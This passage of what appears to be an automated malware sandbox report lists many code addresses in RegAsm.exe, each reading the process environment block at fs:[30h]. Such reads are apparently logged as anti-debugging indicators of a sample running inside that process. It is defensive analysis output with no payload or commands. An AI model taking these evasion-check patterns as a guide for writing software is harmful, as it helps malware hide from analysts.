                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02744144 mov eax, dword ptr fs:[00000030h]6_2_02744144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026AC156 mov eax, dword ptr fs:[00000030h]6_2_026AC156
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026B6154 mov eax, dword ptr fs:[00000030h]6_2_026B6154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026B6154 mov eax, dword ptr fs:[00000030h]6_2_026B6154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026E0124 mov eax, dword ptr fs:[00000030h]6_2_026E0124
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02770115 mov eax, dword ptr fs:[00000030h]6_2_02770115
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0275A118 mov ecx, dword ptr fs:[00000030h]6_2_0275A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0275A118 mov eax, dword ptr fs:[00000030h]6_2_0275A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0275A118 mov eax, dword ptr fs:[00000030h]6_2_0275A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0275A118 mov eax, dword ptr fs:[00000030h]6_2_0275A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0275E10E mov eax, dword ptr fs:[00000030h]6_2_0275E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0275E10E mov ecx, dword ptr fs:[00000030h]6_2_0275E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0275E10E mov eax, dword ptr fs:[00000030h]6_2_0275E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0275E10E mov eax, dword ptr fs:[00000030h]6_2_0275E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0275E10E mov ecx, dword ptr fs:[00000030h]6_2_0275E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0275E10E mov eax, dword ptr fs:[00000030h]6_2_0275E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0275E10E mov eax, dword ptr fs:[00000030h]6_2_0275E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0275E10E mov ecx, dword ptr fs:[00000030h]6_2_0275E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0275E10E mov eax, dword ptr fs:[00000030h]6_2_0275E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0275E10E mov ecx, dword ptr fs:[00000030h]6_2_0275E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026E01F8 mov eax, dword ptr fs:[00000030h]6_2_026E01F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_027861E5 mov eax, dword ptr fs:[00000030h]6_2_027861E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0272E1D0 mov eax, dword ptr fs:[00000030h]6_2_0272E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0272E1D0 mov eax, dword ptr fs:[00000030h]6_2_0272E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0272E1D0 mov ecx, dword ptr fs:[00000030h]6_2_0272E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0272E1D0 mov eax, dword ptr fs:[00000030h]6_2_0272E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0272E1D0 mov eax, dword ptr fs:[00000030h]6_2_0272E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_027761C3 mov eax, dword ptr fs:[00000030h]6_2_027761C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_027761C3 mov eax, dword ptr fs:[00000030h]6_2_027761C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026F0185 mov eax, dword ptr fs:[00000030h]6_2_026F0185
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0273019F mov eax, dword ptr fs:[00000030h]6_2_0273019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0273019F mov eax, dword ptr fs:[00000030h]6_2_0273019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0273019F mov eax, dword ptr fs:[00000030h]6_2_0273019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0273019F mov eax, dword ptr fs:[00000030h]6_2_0273019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02754180 mov eax, dword ptr fs:[00000030h]6_2_02754180
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02754180 mov eax, dword ptr fs:[00000030h]6_2_02754180
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026AA197 mov eax, dword ptr fs:[00000030h]6_2_026AA197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026AA197 mov eax, dword ptr fs:[00000030h]6_2_026AA197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026AA197 mov eax, dword ptr fs:[00000030h]6_2_026AA197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0276C188 mov eax, dword ptr fs:[00000030h]6_2_0276C188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0276C188 mov eax, dword ptr fs:[00000030h]6_2_0276C188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026EA660 mov eax, dword ptr fs:[00000030h]6_2_026EA660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026EA660 mov eax, dword ptr fs:[00000030h]6_2_026EA660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0277866E mov eax, dword ptr fs:[00000030h]6_2_0277866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0277866E mov eax, dword ptr fs:[00000030h]6_2_0277866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026E2674 mov eax, dword ptr fs:[00000030h]6_2_026E2674
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026CC640 mov eax, dword ptr fs:[00000030h]6_2_026CC640
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026B262C mov eax, dword ptr fs:[00000030h]6_2_026B262C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026CE627 mov eax, dword ptr fs:[00000030h]6_2_026CE627
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026E6620 mov eax, dword ptr fs:[00000030h]6_2_026E6620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026E8620 mov eax, dword ptr fs:[00000030h]6_2_026E8620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C260B mov eax, dword ptr fs:[00000030h]6_2_026C260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C260B mov eax, dword ptr fs:[00000030h]6_2_026C260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C260B mov eax, dword ptr fs:[00000030h]6_2_026C260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C260B mov eax, dword ptr fs:[00000030h]6_2_026C260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C260B mov eax, dword ptr fs:[00000030h]6_2_026C260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C260B mov eax, dword ptr fs:[00000030h]6_2_026C260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C260B mov eax, dword ptr fs:[00000030h]6_2_026C260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026F2619 mov eax, dword ptr fs:[00000030h]6_2_026F2619
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0272E609 mov eax, dword ptr fs:[00000030h]6_2_0272E609
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0272E6F2 mov eax, dword ptr fs:[00000030h]6_2_0272E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0272E6F2 mov eax, dword ptr fs:[00000030h]6_2_0272E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0272E6F2 mov eax, dword ptr fs:[00000030h]6_2_0272E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0272E6F2 mov eax, dword ptr fs:[00000030h]6_2_0272E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_027306F1 mov eax, dword ptr fs:[00000030h]6_2_027306F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_027306F1 mov eax, dword ptr fs:[00000030h]6_2_027306F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026EA6C7 mov ebx, dword ptr fs:[00000030h]6_2_026EA6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026EA6C7 mov eax, dword ptr fs:[00000030h]6_2_026EA6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026EC6A6 mov eax, dword ptr fs:[00000030h]6_2_026EC6A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026E66B0 mov eax, dword ptr fs:[00000030h]6_2_026E66B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026B4690 mov eax, dword ptr fs:[00000030h]6_2_026B4690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026B4690 mov eax, dword ptr fs:[00000030h]6_2_026B4690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026B8770 mov eax, dword ptr fs:[00000030h]6_2_026B8770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C0770 mov eax, dword ptr fs:[00000030h]6_2_026C0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C0770 mov eax, dword ptr fs:[00000030h]6_2_026C0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C0770 mov eax, dword ptr fs:[00000030h]6_2_026C0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C0770 mov eax, dword ptr fs:[00000030h]6_2_026C0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C0770 mov eax, dword ptr fs:[00000030h]6_2_026C0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C0770 mov eax, dword ptr fs:[00000030h]6_2_026C0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C0770 mov eax, dword ptr fs:[00000030h]6_2_026C0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C0770 mov eax, dword ptr fs:[00000030h]6_2_026C0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C0770 mov eax, dword ptr fs:[00000030h]6_2_026C0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C0770 mov eax, dword ptr fs:[00000030h]6_2_026C0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C0770 mov eax, dword ptr fs:[00000030h]6_2_026C0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C0770 mov eax, dword ptr fs:[00000030h]6_2_026C0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026E674D mov esi, dword ptr fs:[00000030h]6_2_026E674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026E674D mov eax, dword ptr fs:[00000030h]6_2_026E674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026E674D mov eax, dword ptr fs:[00000030h]6_2_026E674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02734755 mov eax, dword ptr fs:[00000030h]6_2_02734755
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0273E75D mov eax, dword ptr fs:[00000030h]6_2_0273E75D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026B0750 mov eax, dword ptr fs:[00000030h]6_2_026B0750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026F2750 mov eax, dword ptr fs:[00000030h]6_2_026F2750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026F2750 mov eax, dword ptr fs:[00000030h]6_2_026F2750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0272C730 mov eax, dword ptr fs:[00000030h]6_2_0272C730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026EC720 mov eax, dword ptr fs:[00000030h]6_2_026EC720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026EC720 mov eax, dword ptr fs:[00000030h]6_2_026EC720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026E273C mov eax, dword ptr fs:[00000030h]6_2_026E273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026E273C mov ecx, dword ptr fs:[00000030h]6_2_026E273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026E273C mov eax, dword ptr fs:[00000030h]6_2_026E273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026EC700 mov eax, dword ptr fs:[00000030h]6_2_026EC700
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026B0710 mov eax, dword ptr fs:[00000030h]6_2_026B0710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026E0710 mov eax, dword ptr fs:[00000030h]6_2_026E0710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026D27ED mov eax, dword ptr fs:[00000030h]6_2_026D27ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026D27ED mov eax, dword ptr fs:[00000030h]6_2_026D27ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026D27ED mov eax, dword ptr fs:[00000030h]6_2_026D27ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026B47FB mov eax, dword ptr fs:[00000030h]6_2_026B47FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026B47FB mov eax, dword ptr fs:[00000030h]6_2_026B47FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0273E7E1 mov eax, dword ptr fs:[00000030h]6_2_0273E7E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026BC7C0 mov eax, dword ptr fs:[00000030h]6_2_026BC7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_027307C3 mov eax, dword ptr fs:[00000030h]6_2_027307C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026B07AF mov eax, dword ptr fs:[00000030h]6_2_026B07AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_027647A0 mov eax, dword ptr fs:[00000030h]6_2_027647A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0275678E mov eax, dword ptr fs:[00000030h]6_2_0275678E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0273C460 mov ecx, dword ptr fs:[00000030h]6_2_0273C460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026DA470 mov eax, dword ptr fs:[00000030h]6_2_026DA470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026DA470 mov eax, dword ptr fs:[00000030h]6_2_026DA470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026DA470 mov eax, dword ptr fs:[00000030h]6_2_026DA470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0276A456 mov eax, dword ptr fs:[00000030h]6_2_0276A456
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026EE443 mov eax, dword ptr fs:[00000030h]6_2_026EE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026EE443 mov eax, dword ptr fs:[00000030h]6_2_026EE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026EE443 mov eax, dword ptr fs:[00000030h]6_2_026EE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026EE443 mov eax, dword ptr fs:[00000030h]6_2_026EE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026EE443 mov eax, dword ptr fs:[00000030h]6_2_026EE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026EE443 mov eax, dword ptr fs:[00000030h]6_2_026EE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026EE443 mov eax, dword ptr fs:[00000030h]6_2_026EE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026EE443 mov eax, dword ptr fs:[00000030h]6_2_026EE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026A645D mov eax, dword ptr fs:[00000030h]6_2_026A645D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026D245A mov eax, dword ptr fs:[00000030h]6_2_026D245A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026AE420 mov eax, dword ptr fs:[00000030h]6_2_026AE420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026AE420 mov eax, dword ptr fs:[00000030h]6_2_026AE420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026AE420 mov eax, dword ptr fs:[00000030h]6_2_026AE420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026AC427 mov eax, dword ptr fs:[00000030h]6_2_026AC427
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02736420 mov eax, dword ptr fs:[00000030h]6_2_02736420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02736420 mov eax, dword ptr fs:[00000030h]6_2_02736420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02736420 mov eax, dword ptr fs:[00000030h]6_2_02736420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02736420 mov eax, dword ptr fs:[00000030h]6_2_02736420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02736420 mov eax, dword ptr fs:[00000030h]6_2_02736420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02736420 mov eax, dword ptr fs:[00000030h]6_2_02736420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02736420 mov eax, dword ptr fs:[00000030h]6_2_02736420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026E8402 mov eax, dword ptr fs:[00000030h]6_2_026E8402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026E8402 mov eax, dword ptr fs:[00000030h]6_2_026E8402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026E8402 mov eax, dword ptr fs:[00000030h]6_2_026E8402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026B04E5 mov ecx, dword ptr fs:[00000030h]6_2_026B04E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026B64AB mov eax, dword ptr fs:[00000030h]6_2_026B64AB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0273A4B0 mov eax, dword ptr fs:[00000030h]6_2_0273A4B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026E44B0 mov ecx, dword ptr fs:[00000030h]6_2_026E44B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0276A49A mov eax, dword ptr fs:[00000030h]6_2_0276A49A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026E656A mov eax, dword ptr fs:[00000030h]6_2_026E656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026E656A mov eax, dword ptr fs:[00000030h]6_2_026E656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026E656A mov eax, dword ptr fs:[00000030h]6_2_026E656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026B8550 mov eax, dword ptr fs:[00000030h]6_2_026B8550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026B8550 mov eax, dword ptr fs:[00000030h]6_2_026B8550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026DE53E mov eax, dword ptr fs:[00000030h]6_2_026DE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026DE53E mov eax, dword ptr fs:[00000030h]6_2_026DE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026DE53E mov eax, dword ptr fs:[00000030h]6_2_026DE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026DE53E mov eax, dword ptr fs:[00000030h]6_2_026DE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026DE53E mov eax, dword ptr fs:[00000030h]6_2_026DE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C0535 mov eax, dword ptr fs:[00000030h]6_2_026C0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C0535 mov eax, dword ptr fs:[00000030h]6_2_026C0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C0535 mov eax, dword ptr fs:[00000030h]6_2_026C0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C0535 mov eax, dword ptr fs:[00000030h]6_2_026C0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C0535 mov eax, dword ptr fs:[00000030h]6_2_026C0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026C0535 mov eax, dword ptr fs:[00000030h]6_2_026C0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02746500 mov eax, dword ptr fs:[00000030h]6_2_02746500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02784500 mov eax, dword ptr fs:[00000030h]6_2_02784500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02784500 mov eax, dword ptr fs:[00000030h]6_2_02784500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02784500 mov eax, dword ptr fs:[00000030h]6_2_02784500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02784500 mov eax, dword ptr fs:[00000030h]6_2_02784500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02784500 mov eax, dword ptr fs:[00000030h]6_2_02784500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02784500 mov eax, dword ptr fs:[00000030h]6_2_02784500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02784500 mov eax, dword ptr fs:[00000030h]6_2_02784500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026EC5ED mov eax, dword ptr fs:[00000030h]6_2_026EC5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026EC5ED mov eax, dword ptr fs:[00000030h]6_2_026EC5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026DE5E7 mov eax, dword ptr fs:[00000030h]6_2_026DE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026DE5E7 mov eax, dword ptr fs:[00000030h]6_2_026DE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026DE5E7 mov eax, dword ptr fs:[00000030h]6_2_026DE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026DE5E7 mov eax, dword ptr fs:[00000030h]6_2_026DE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026DE5E7 mov eax, dword ptr fs:[00000030h]6_2_026DE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026DE5E7 mov eax, dword ptr fs:[00000030h]6_2_026DE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026DE5E7 mov eax, dword ptr fs:[00000030h]6_2_026DE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026DE5E7 mov eax, dword ptr fs:[00000030h]6_2_026DE5E7
